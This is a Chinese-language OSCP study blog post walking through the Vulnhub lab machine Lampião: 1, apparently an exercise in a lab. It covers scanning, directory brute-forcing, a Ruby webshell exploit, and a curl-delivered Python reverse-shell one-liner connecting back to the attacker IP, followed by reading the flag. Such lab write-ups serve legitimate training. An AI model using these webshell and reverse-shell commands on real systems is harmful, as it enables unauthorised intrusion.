OSCP备考_0x12_Vulnhub靶机_Lampião: 1

Ethan医生8个月前靶场225
名称说明
靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.136

arp-scan 192.168.233.1/24

image.png

nmap -p- 192.168.233.136 

image.png

nmap -p22,80,1898 -A -T4 192.168.233.136

image.png

直接爆破80端口 直接timeout


image.png

那测试看看18978端口,查询的时后最好加后缀查询-x

gobuster dir -u http://192.168.233.136:1898 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt


image.png

image.png

image.png

直接使用rb脚本进行webshell

ruby 44449.rb http://192.168.233.136:1898/

image.png

这里既然可以用访问的方式让shell反弹给自己

curl 'http://192.168.233.136:1898/shell.php' -d "c=python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"192.168.233.168\",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\")'"

image.png

nc -lvnp 3333

image.png

接下来查看有没有可以做提权的操作获取root权限


image.png

image.png

cat flag.txt

image.png




标签: OSCP

相关文章

OSCP备考_0x33_HackThBox靶机_luanne

OSCP备考_0x33_HackThBox靶机_luanne

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.167.171 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。